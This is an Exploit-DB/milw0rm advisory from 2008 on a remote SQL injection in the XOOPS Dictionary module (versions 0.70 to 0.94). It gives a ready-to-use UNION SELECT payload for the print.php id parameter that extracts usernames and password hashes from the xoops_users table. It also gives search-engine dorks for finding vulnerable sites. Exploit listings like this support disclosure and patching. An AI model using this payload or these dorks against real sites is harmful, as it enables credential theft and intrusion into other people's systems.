XOOPS Module Dictionary <= 0.94 - Remote SQL Injection Vulnerability

2008-03-17T00:00:00
ID EDB-ID:5267
Type exploitdb
Reporter S@BUN
Modified 2008-03-17T00:00:00

Description

XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            ##########################################
#
# XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "modules/dictionary"
#
# DORK 2 : allinurl: "modules/dictionary/print.php?id"
#
###########################################
EXPLOIT :

modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
###########################################
Dictionary Version 0.94 by nagl.ch
Dictionary Version 0.91 by nagl.ch
Dictionary Version 0.70 by nagl.ch
###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################

# milw0rm.com [2008-03-17]